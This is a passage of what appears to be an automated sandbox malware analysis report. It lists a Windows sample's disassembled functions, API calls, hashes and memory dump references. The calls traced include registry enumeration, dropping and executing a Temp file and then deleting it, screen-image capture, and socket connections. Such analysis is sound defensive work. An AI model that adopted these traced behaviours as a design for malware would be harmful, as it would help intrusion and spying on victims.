                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040B05A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B063
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B06F
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([regsplt],?), ref: 0040B084
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000), ref: 0040B09F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B0AD
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040B0BB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0C7
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D3
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0DF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@G@std@@$??1?$basic_string@$G@2@@std@@$??0?$basic_string@$Hstd@@V01@V01@@V?$basic_string@Y?$basic_string@$D@1@@V10@@$D@2@@0@EnumG@1@@G@2@@0@$InfoQueryV10@0@Value_itoa
                                                • String ID: [regsplt]
                                                • API String ID: 2158026845-4262303796
                                                • Opcode ID: 8cff23506c9dcb327d004423012b36e824569878459136bd91875200537e0429
                                                • Instruction ID: cc80ac265b5ea2df847b84b2b2dbab06691396435459e9b21fec3c263dc06e50
                                                • Opcode Fuzzy Hash: 8cff23506c9dcb327d004423012b36e824569878459136bd91875200537e0429
                                                • Instruction Fuzzy Hash: 367198B290011EAFDB11DF90DD95DEEBB7CFB18305F0081A6E606A2150EB749B89CF59
                                                Function 0040B191 Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 148registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040B1A6
                                                  • Part of subcall function 0040B0F8: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM), ref: 0040B10B
                                                  • Part of subcall function 0040B0F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B17B
                                                • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,?), ref: 0040B1C4
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00413984,00419288,00000000,00419288,00000000,00419288,00419D40,00419288,00419D60), ref: 0040B22C
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00419D40,00419288,00419D60), ref: 0040B239
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00419288,00419D60), ref: 0040B246
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00419288,00419D60), ref: 0040B253
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00419288,00419D60), ref: 0040B260
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00419288), ref: 0040B26D
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B27D
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B287
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000071), ref: 0040B2A1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B2AA
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B2B3
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B2BC
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B2C5
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B2CE
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B2D7
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B2E0
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B2EC
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(004137F0), ref: 0040B2FD
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(004137F0), ref: 0040B309
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670), ref: 0040B31A
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670), ref: 0040B326
                                                • RegCloseKey.ADVAPI32(?), ref: 0040B32F
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413988,?), ref: 0040B347
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000072), ref: 0040B35C
                                                  • Part of subcall function 0040AE7D: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 0040AEEC
                                                  • Part of subcall function 0040AE7D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 0040AF1B
                                                  • Part of subcall function 0040AE7D: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041417C,?), ref: 0040AF31
                                                  • Part of subcall function 0040AE7D: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF43
                                                  • Part of subcall function 0040AE7D: ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040AF51
                                                  • Part of subcall function 0040AE7D: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF5A
                                                  • Part of subcall function 0040AE7D: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF63
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$G@std@@V10@0@$G@2@@std@@$V01@$??4?$basic_string@$??0?$basic_string@$V01@@V10@@$??8std@@CloseD@1@@EnumG@1@@G@2@@0@InfoOpenQueryY?$basic_string@
                                                • String ID: p6A
                                                • API String ID: 3909728815-595022129
                                                • Opcode ID: 25a0cbb1e5955caba7e5677cdc3c19ccf2cd48252a3f88a26c83d53bf2acdcdc
                                                • Instruction ID: 2056ae82baa0d00cc158b8747cfe5b403208ffe184cd5bb3e09086c41e73c1d0
                                                • Opcode Fuzzy Hash: 25a0cbb1e5955caba7e5677cdc3c19ccf2cd48252a3f88a26c83d53bf2acdcdc
                                                • Instruction Fuzzy Hash: A9418572900109ABCB04BFA1ED5ADDF7B7CEB10305B10817AF506A3191EA789F45CBA9
                                                Function 0040EB85 Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 120filesynchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413764,?,?), ref: 0040EBA0
                                                • getenv.MSVCRT ref: 0040EBAC
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 0040EBB8
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EBC5
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EBD0
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EBD9
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040EBE6
                                                • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040EBF3
                                                • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040EBFF
                                                • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040EC18
                                                • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040EC25
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040EC44
                                                • ShellExecuteExA.SHELL32(0000003C), ref: 0040EC61
                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040EC99
                                                • CloseHandle.KERNEL32(?), ref: 0040ECA2
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040ECAB
                                                • DeleteFileA.KERNEL32(00000000), ref: 0040ECB2
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 0040EC85
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?,?,?,?,?), ref: 0040ECCC
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 0040ECE6
                                                • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(0000006F), ref: 0040ECFE
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040ED07
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040ED10
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040ED19
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@std@@@std@@$?c_str@?$basic_string@V?$basic_string@$D@2@@0@Hstd@@$??0?$basic_ofstream@??6std@@?close@?$basic_ofstream@?is_open@?$basic_ofstream@CloseD?$basic_ofstream@D@2@@0@@D@std@@@0@DeleteExecuteFileHandleObjectShellSingleV01@@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                                • String ID: <$@$Temp
                                                • API String ID: 2271834883-1032778388
                                                • Opcode ID: e52d138bcfb490f1b80497a0561799877e956440a3de0df827a9bfd32d9eb261
                                                • Instruction ID: 3689fd71246cb1742730e42802e0dd38cc1dbb75999f8c4bec599ec1ada99012
                                                • Opcode Fuzzy Hash: e52d138bcfb490f1b80497a0561799877e956440a3de0df827a9bfd32d9eb261
                                                • Instruction Fuzzy Hash: 91414F7194011AEBDB14EFA0DD4AAEEBB78FF04706F10807AF502A21D0DB795B49CB59
                                                Function 0040DB64 Relevance: 43.7, APIs: 29, Instructions: 154COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004112FA: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411309
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411313
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041131C
                                                  • Part of subcall function 004112FA: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411326
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411330
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?), ref: 00411346
                                                  • Part of subcall function 004112FA: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041134F
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00419E68,00413888,00000000,00000001), ref: 0040DB8F
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DB9C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DBAA
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DBB6
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040DBC3
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040DBD0
                                                  • Part of subcall function 00411980: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,80000001,00419970,?,00409E13,?,?), ref: 0041199A
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B), ref: 0040DBF4
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040DC06
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040DC0F
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040DC24
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040DC2E
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,0040846F,00000000), ref: 00402FD7
                                                  • Part of subcall function 00402FC1: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402FE3
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402FF8
                                                  • Part of subcall function 00402FC1: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403001
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040DC4B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DC57
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,?,00000000,00000000,?,00000000,00000002,?,00000000,00000003,?,?), ref: 0040DC9F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000003,?,?,?,?,?,?,00000001), ref: 0040DCAF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040DCBF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040DCCF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DCDF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DCEF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DCFF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DD09
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DD21
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DD2D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DD39
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DD45
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DD51
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DD5D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DD69
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DD72
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$Hstd@@V?$basic_string@$G@std@@V10@0@$D@2@@0@$G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@V01@@$?begin@?$basic_string@?data@?$basic_string@?size@?$basic_string@D@1@@G@2@@0@$??4?$basic_string@?end@?$basic_string@?length@?$basic_string@CreateFileG@1@@V01@V10@
                                                • String ID:
                                                • API String ID: 1785028988-0
                                                • Opcode ID: 9f9d1182f2fc15583929cf17a1554aebeb218aca5fa8146dec45e650895f7836
                                                • Instruction ID: 38fc57fc2121e37178f0118e06747127780e12511175b92f8b90c33b557dd1ef
                                                • Opcode Fuzzy Hash: 9f9d1182f2fc15583929cf17a1554aebeb218aca5fa8146dec45e650895f7836
                                                • Instruction Fuzzy Hash: 3C51E3B1C00119ABDF15BBA0DD5AEEF773CAB14305F0041AAF506E20A1EE785B89CB59
                                                Function 0040F50A Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 233libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GdiplusStartup.GDIPLUS(00419E14,?,00000000,00000000,00000000,00000000), ref: 0040F53C
                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040F550
                                                • GetProcAddress.KERNEL32(00000000), ref: 0040F557
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F573
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419E78), ref: 0040F5B0
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F5C7
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040F5D1
                                                  • Part of subcall function 0040F7DE: GdipLoadImageFromStreamICM.GDIPLUS(00000000,?,00000000), ref: 0040F7FB
                                                  • Part of subcall function 0040F44E: malloc.MSVCRT ref: 0040F475
                                                  • Part of subcall function 0040F8AD: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,?,0040F63E,00000000,?,?), ref: 0040F8BF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040F65B
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040F679
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 0040F69C
                                                • _itoa.MSVCRT ref: 0040F6A3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00419288,?,00419288,00419E78), ref: 0040F70F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00419288,00419E78), ref: 0040F71F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00419288,00419E78), ref: 0040F72C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000010,?,?,?,?,?,?,?,?,?,?,00419288,00419E78), ref: 0040F74A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00419288,00419E78), ref: 0040F756
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00419288,00419E78), ref: 0040F736
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00419288,?), ref: 0040F777
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040F781
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004D,?,?,?,?,?,?), ref: 0040F798
                                                  • Part of subcall function 00401FC3: socket.WS2_32(00000000,00000001,00000006), ref: 00401FDA
                                                  • Part of subcall function 00402022: connect.WS2_32(00419D80,00419D84,00000010), ref: 00402038
                                                  • Part of subcall function 0040209F: CreateThread.KERNEL32(00000000,00000000,004020BE,?,00000000,00000000), ref: 004020B4
